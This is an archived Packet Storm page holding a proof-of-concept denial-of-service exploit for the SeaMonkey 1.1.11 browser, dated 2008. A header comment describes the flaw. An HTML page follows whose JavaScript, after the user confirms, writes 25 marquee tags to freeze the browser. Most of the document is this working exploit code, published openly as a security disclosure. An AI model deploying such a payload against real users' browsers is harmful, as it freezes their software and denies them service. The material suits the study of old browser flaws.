SeaMonkey version 1.1.11 remote denial of service proof of concept exploit that makes use of excessive marquee tags being used.
7979820e27787a76389010e82a185477<!--
Title: SeaMonkey 1.1.11 Remote Denial of Service Exploit PoC
Summary: Web-browser, advanced e-mail and newsgroup client,
IRC chat client, and HTML editing made simple - all your
Internet needs in one application.
Product web page: http://www.seamonkey-project.org/
Desc: SeaMonkey suffers from a remote denial of service
vulnerability (DoS), using a special html file with the
<marquee> tag multiple times (>24). Successfully exploiting
these issues allows remote attackers to cause the application
to freeze, denying service to legitimate users.
Tested on Microsoft Windows XP SP2 (English)
Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
liquidworm [t00t] gmail [d0t] com
http://www.zeroscience.org
08.09.2008
-->
<html>
<title>SeaMonkey 1.1.11 Remote Denial of Service Exploit</title>
<head>
<body>
<br /><br /><br /><br />
<br /><br /><br /><br />
<br /><br /><br /><br />
<center>
<script type="text/javascript">
document.write("<kbd>Wooow Camel..!! WOW!</kbd>");
function t00t()
{
for(i=0; i < 25; i++)
{
document.write("<marquee>");
}
}
alert("SeaMonkey 1.1.11 Remote Denial of Service Exploit");
var b0x = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");
if (b0x == true)
{
t00t();
}
else {
alert("Allrighty Then!");
window.location.href = "http://www.disneyland.com";
}
</script> </center> </body> </head> </html>
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!